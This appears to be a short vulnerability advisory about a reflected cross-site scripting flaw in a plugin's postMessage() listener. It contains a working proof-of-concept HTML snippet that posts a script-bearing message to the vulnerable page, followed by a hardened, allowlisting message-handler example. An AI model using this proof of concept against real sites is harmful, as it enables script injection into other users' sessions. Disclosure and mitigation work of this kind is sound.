The plugin was affected by a Reflected Cross-Site Scripting issue via the postMessage() event.
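Use the following code on another website:

```html
<script>
  // Open the affected page in a new window and keep a handle to it
  var popup = window.open('https://VULNERABLE.PAGE/');
  var msg = {};
  msg.method = "alert(document.domain)";
  // Re-send the message every second until the page's listener is ready
  function post() { popup.postMessage(msg, '*'); }
  setInterval(post, 1000);
</script>
```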
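A receiver-side mitigation for this class of issue, as an added example that is not the plugin's code or its actual fix. It assumes the affected listener executed the `method` field of incoming messages, which the advisory does not show; the origin `https://app.example.com` and the action names are hypothetical.

```javascript
// Added example: hardened postMessage receiver (hypothetical names throughout).
// Origins allowed to send messages to this page.
const TRUSTED_ORIGINS = new Set(['https://app.example.com']);

// Allowlisted actions: message data selects a function, it is never evaluated.
const ACTIONS = Object.freeze({
  resize: (args) => ({ resized: Number(args.height) || 0 }),
  close: () => ({ closed: true }),
});

function makeMessageHandler(trustedOrigins, actions) {
  return function onMessage(event) {
    // 1. Reject senders that are not explicitly trusted. The PoC above posts
    //    from an arbitrary site, so its messages stop here.
    if (!trustedOrigins.has(event.origin)) {
      return { ok: false, reason: 'untrusted-origin' };
    }
    const data = event.data;
    // 2. Require the expected shape before touching any field.
    if (data === null || typeof data !== 'object' || typeof data.method !== 'string') {
      return { ok: false, reason: 'malformed' };
    }
    // 3. Resolve own properties only, so names such as "constructor" or
    //    "__proto__" never reach an inherited function.
    if (!Object.prototype.hasOwnProperty.call(actions, data.method)) {
      return { ok: false, reason: 'unknown-method' };
    }
    return { ok: true, result: actions[data.method](data.args || {}) };
  };
}

const handleMessage = makeMessageHandler(TRUSTED_ORIGINS, ACTIONS);

// Register the listener only when running in a browser.
if (typeof window !== 'undefined') {
  window.addEventListener('message', handleMessage);
}
```

Even a message from a trusted origin cannot run script here, because `method` is only ever used as a lookup key into the fixed action table.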
2021-01-20 (about 2 years ago)
2021-01-20 (about 2 years ago)
2021-01-21 (about 2 years ago)